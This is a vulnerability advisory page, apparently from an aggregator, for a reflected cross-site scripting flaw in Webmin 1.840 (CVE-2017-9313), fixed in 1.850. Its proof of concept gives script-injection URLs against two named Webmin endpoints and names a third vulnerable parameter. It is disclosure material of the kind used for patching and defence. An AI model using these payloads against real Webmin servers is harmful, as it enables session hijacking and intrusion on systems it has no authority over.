Webmin 1.840 Cross Site Scripting Vulnerability

🗓️ 04 Jul 2017 00:00:00Reported by Andy TanType

zdt🔗 0day.today👁 41 Views

Webmin 1.840 XSS Vulnerability Patche

Reporter	Title	Published	Views	Family All 12
Circl	CVE-2017-9313	17 May 202615:23	–	circl
CNVD	Webmin cross-site scripting vulnerability (CNVD-2017-21737)	5 Jul 201700:00	–	cnvd
CVE	CVE-2017-9313	4 Jul 201702:00	–	cve
Cvelist	CVE-2017-9313	4 Jul 201702:00	–	cvelist
EUVD	EUVD-2017-18248	7 Oct 202500:30	–	euvd
NVD	CVE-2017-9313	4 Jul 201702:29	–	nvd
OpenVAS	Webmin Multiple XSS Vulnerabilities (Jul 2017) - Linux	11 Jul 201700:00	–	openvas
OpenVAS	Webmin Multiple XSS Vulnerabilities (Jul 2017) - Windows	11 Jul 201700:00	–	openvas
Packet Storm	Webmin 1.840 Cross Site Scripting	3 Jul 201700:00	–	packetstorm
Prion	Cross site scripting	4 Jul 201702:29	–	prion

Vulnerability type: Reflected Cross Site Scripting
------------------------
Product: Webmin
------------------------
Affected version: Webmin 1.840 and possibly 
earlier
------------------------
Patched version: Webmin 1.850
------------------------
Credit: Andy Tan
------------------------
CVE ID: CVE-2017-9313
------------------------

===============
Proof of Concept
================
Vulnerable Modules:
https://192.168.1.20:10000/man/view_man.cgi?page=foo&sec=<script>alert('xss')</script>

https://192.168.1.20:10000/webmin/change_referers.cgi?referer=0&referers=<script>alert('xss')</script>

https://192.168.1.20:10000/acl/save_user.cgi
(Vulnerable 'name' parameter)

Vendor contact timeline:
------------------------
2017-06-12: Contacted vendor.
2017-06-28: Vendor released new patch.
2017-07-02: Public disclosure.

#  0day.today [2018-03-06]  #

04 Jul 2017 00:00Current

6.4Medium risk

Vulners AI Score6.4

EPSS0.00601